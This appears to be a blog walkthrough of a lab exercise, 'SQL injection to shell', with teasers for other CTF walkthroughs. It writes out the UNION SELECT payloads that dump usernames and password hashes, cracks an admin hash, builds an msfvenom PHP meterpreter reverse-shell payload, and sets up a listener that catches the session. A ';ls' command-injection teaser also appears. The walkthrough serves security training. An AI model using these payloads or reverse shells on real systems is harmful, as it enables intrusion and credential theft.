SQL injection to shell

Lab Environment
Attacker's Machine - Linux kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2 (2017-11-08) x86_64 GNU/Linux
Vulnerable Machine - SQL injection to shell


Proof Of Concept
  • arp-scan --local (to scan for the machines connected to the network)
  • vulnerable machine IP - 172.16.60.160


Now i will use nmap for further scanning the machine's IP
  •   nmap -sSCV 172.16.60.160
It revealed HTTP service on Port 80 in active state.
So i just browsed the IP in browser to see the webpage (as Port 80 is running).
It showed me many options on which i can click so i choose to click on test.
On clicking on test parameter it showed me GET method in url which can lead to SQL injection attack .


After that i just confirmed that if SQL injection attack is working or not by placing an apostrophe(‘) after id=1.
It gave me the syntax error which confirmed me that SQL injection attack is working .
Note: All commands of sqli will be executed after the url .
Now its time to start the attack by extracting information by passing queries in the URL .
  • Order by 5 ---+ (Order by command reveals that on how many columns data is present)
After passing columns 5 it showed me the error (error : unknown column 5 in ‘order clause’) ,it means that there are less columns than 5.
Then i decided to go for 4 columns .
  • Order by 4 --+
    It reflected the data on the web page that means there are 4 columns .


After identifying the number of columns i passed another command  to view which column is vulnerable .
Command : url union select 1,2,3,4 --+
So it reflected number 2 on the web page which means that column 2 is vulnerable or we can extract the data through second column .
Database version extraction :  union select 1,version(),3,4 --+
Table_name extraction : union select 1,table_name,3,4 from information_schema.tables --+



Column extraction :  union select 1,column_name,3,4 from information_schema.columns where table_name=”users”
Now extracting id,login,password
Union select 1,group_concat(id,0x0a,login,0x0a,password),3,4 from users --+
Note:here 0x0a is used only to provide space between id,login and password.


Now we got login name as admin and password is encrypted so i just copied it and searched it on google and i found that it is md5 hash .
Result after decrypting the hash : P4ssw0rd


Now i have clicked on admin parameter on the home page and it gave me the admin panel to login


Logged into it by providing credentials which i already got from sqli attack .
After login i got is a page to add a new picture


Now made a php payload so that i can upload it on the server and gain access to the server .
Payload generation command :  msfvenom -p php/meterpreter/reverse_tcp lhost=attackers ip lport=1337 R > /root/Desktop/upload.php


Now i started the listener in msfconsole to listen the payload after uploading it to the server
Command to configure the listener : use exploit/multi/handler
Requirements of listener : set payload php/meterpreter/reverse_tcp
                 Set lhost attackers ip
     Set lport 1337
Then simply type run to execute it
When the browser is refreshed it gave me the session .
   



Popular posts from this blog

Calculat3 M3 | CTF Learn

Image
This walkthrough will demonstrate the simple challenge based on command injection Calculat3 M3 This is the challenge page we got after visiting the given link. I provided random input in this calculator and intercepted the request with BurpSuite I got one parameter "expression" taking the values  Tried for command injection with ";ls" Forwarding the above request finally Got the Flag
Read more

TryHackme: Blue Walkthrough

Image
Task 1: Recon After we've connected to the tryhackme network the first task is to enumerate the target. We use Nmap for scanning the target IP. Command Used : nmap -sS -Pn <target-ip> -sS : Scan using TCP SYN scan -Pn : Treats all host as online --skip host discovery Next we used a command to find the vulnerability on the target machine. Command Used : nmap --script vuln <target-ip> --script : Specify the --script option to choose your own scripts to execute by providing categories , script file names, or the name of directories full of scripts you wish to execute. vuln : These scripts check for known vulnerabilites and generally only report results if they are found. Below, we see that nmap is indicating the target may be vulnerable to ms17-010(on the left0 and we can verify this using metasploit. To start Metasploit use command "msfconsole" We start by simply doing a search for ms17-010 Here we use module 2 i.e. exploit/windows
Read more

HackTheBox-Traceback Walkthrough

Image
I started with scanning the IP Addr with nmap using the simple command. Command Used: nmap IP Addr of machine -Pn  nmap 10.10.10.181 -Pn  Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-15 02:27 IST Nmap scan report for 10.10.10.181 Host is up (0.18s latency). Not shown: 998 closed ports PORT   STATE SERVICE 22/tcp open  ssh 80/tcp open  http Now only two things were in my mind and those were what should I enumerate first ssh or http. SSH can only be bruteforced and this point and bruteforce on the online machine doesn't works or we can say that most online hosted machines are not made to be bruteforced. So, I started  with HTTP. I fired up directory burster to find juicy directories if any and mean while I decided to browse the IP Addr since HTTP Service is active and running. I was presented with the below screen  dirb was not able to find any directories but the hint was already on th
Read more